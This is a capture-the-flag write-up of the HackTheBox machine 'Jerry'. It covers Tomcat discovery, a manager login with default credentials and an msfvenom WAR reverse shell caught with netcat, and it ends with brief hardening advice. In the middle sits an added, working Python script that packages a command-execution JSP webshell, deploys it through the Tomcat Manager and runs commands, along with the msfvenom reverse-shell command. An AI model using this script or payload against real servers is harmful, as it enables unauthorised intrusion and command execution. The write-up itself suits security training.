Jerry is a Windows-based CTF from HackTheBox.
Attempted to browse to the host, but got no response. Confirmed the host is alive with ping, which narrows the approach a little: the box is up, so nothing is answering on the default web port. Let's jump directly into scanning for other interesting services.
The initial nmap scan failed, reporting the host as down: its host-discovery probes evidently got no reply even though ping did. Ran nmap with the -Pn flag instead, which skips host discovery and treats the host as up, and the scan worked.
After finding a single open service, I scanned it further to enumerate it. This was also obvious after browsing to the IP on that port: it's a Tomcat service.
Didn't find anything more, unfortunately, so Tomcat is what we're attacking today.
Fortunately, I've got a little experience attacking Tomcat. In previous CTFs I've come across a few versions; most require us to access the Tomcat Manager application.
Let's try to find the exact version of Tomcat the system is using, and whether we can get simple access to the manager.
Browse to host
The version is shown at the top of the page.
Access manager app
Clicking around, I found the manager application. As usual, it requests a username and password.
Whichever genius set up this installation left the default credentials in place, which allows us to log in.
We can access both the Server Status page and the HTML manager interface. We can likely reach more, but those are the links accessible from the homepage.
Find potential attack vector
I searched around for somewhere to upload a payload. We can upload WAR files to the server via the /manager/html page; see the Deploy section. Anything deployed there runs with the privileges of the Tomcat process, so this is our attack vector.
MSFVenom WAR payload
We can generate the payload with msfvenom. To run on Tomcat, it needs to be a Java/JSP payload packaged in WAR format, since Tomcat is Java-based and runs JSP files.
Now that we have a payload, let's upload (deploy) it. After you click Browse, select your payload and click Deploy, you'll notice another record is attached to the application list. The application takes on the name of the WAR file you deployed.
To access and execute the reverse shell, simply browse to the application's URL; in the above case we need to browse to /shell, matching the name of the WAR we uploaded.
But before we execute the shell, we need to start a listener for the reverse shell. We'll use netcat listening on the port set in the payload (the LPORT must match, or the shell will call back to nothing).
After starting the listener, navigate to the exploit path. This gives us a shell.
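The whole chain above (build the WAR, push it through the manager, browse to the deployed path) scripted in Python, as an added example that is not code from the original writeup. It assumes placeholder target and credentials (BASE_URL, USER, PASSWORD are not from the page, which only says the manager accepted default credentials), assumes the account also holds the manager-script role so the scriptable /manager/text deploy endpoint can be used instead of the /manager/html form, and uses a hand-written command-execution JSP (JSP_STUB) as a stand-in for the msfvenom JSP reverse shell.

```python
"""Added example, not code from the original writeup.

Packages a JSP into a WAR, deploys it through the Tomcat Manager and
triggers it: the three steps the writeup does by hand (msfvenom, the
Deploy form on /manager/html, browsing to /shell).

Assumptions that are NOT from the page:
  - BASE_URL, USER and PASSWORD are placeholders.
  - The account also has the manager-script role, so the scriptable
    /manager/text API can be used instead of the /manager/html form.
  - JSP_STUB is a hand-written command-execution JSP standing in for the
    msfvenom reverse shell, which would be generated with
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<you> LPORT=<port> -f war -o shell.war
"""
import base64
import io
import urllib.parse
import urllib.request
import zipfile

BASE_URL = "http://127.0.0.1:8080"  # placeholder target (assumed)
USER = "user"                        # placeholder credentials (assumed)
PASSWORD = "pass"
CONTEXT = "shell"                    # WAR name becomes the context path
JSP_NAME = "index.jsp"

# Minimal deployment descriptor: Tomcat needs a valid web.xml to deploy
# the WAR; the JSP itself is compiled on first request.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
</web-app>
"""

# Stand-in for the msfvenom JSP: runs ?cmd=... and returns its stdout.
JSP_STUB = """<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    InputStream in = p.getInputStream();
    int c;
    while ((c = in.read()) != -1) out.print((char) c);
  }
%>
"""


def build_war(jsp_source, jsp_name=JSP_NAME):
    """Return the bytes of a WAR (a zip) holding web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the archive members, so the WAR can be inspected before upload."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def basic_auth_header(user, password):
    """HTTP Basic credentials in the form the manager expects."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def deploy_url(base, context):
    """Text-interface deploy endpoint; update=true replaces an existing app."""
    return f"{base}/manager/text/deploy?path=/{context}&update=true"


def deploy(base, user, password, context, war_bytes):
    """PUT the WAR to the manager; Tomcat answers with a line starting 'OK'."""
    req = urllib.request.Request(deploy_url(base, context),
                                 data=war_bytes, method="PUT")
    req.add_header("Authorization", basic_auth_header(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


def trigger(base, context, jsp_name, cmd):
    """Request the deployed JSP: the equivalent of browsing to /shell."""
    url = f"{base}/{context}/{jsp_name}?cmd={urllib.parse.quote(cmd)}"
    with urllib.request.urlopen(url, timeout=15) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    war = build_war(JSP_STUB)
    print("WAR contents:", war_entries(war))
    print(deploy(BASE_URL, USER, PASSWORD, CONTEXT, war))
    print(trigger(BASE_URL, CONTEXT, JSP_NAME, "whoami"))
```

The stub returns command output in the HTTP response, so no listener is needed to confirm execution. With the msfvenom payload swapped in, the JSP connects back on first request, so start the listener (nc -lvnp with the payload's LPORT) before calling trigger(), exactly as the writeup does before browsing to /shell.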
Getting user & root flag
Now that we have a shell we can look around for more info.
This system is pretty poor in terms of security. Tomcat must be running as Administrator, because we can navigate directly to the Administrator's Desktop directory and pull the flags. The flag file there gives us both the user flag and the root flag!
In a real deployment, Tomcat should run as a dedicated low-privilege service account and the manager application should never keep its default credentials: the second fix would have blocked the login entirely, and the first would have kept a deployed webshell from reading the Administrator's files.
And there we have it. Jerry complete.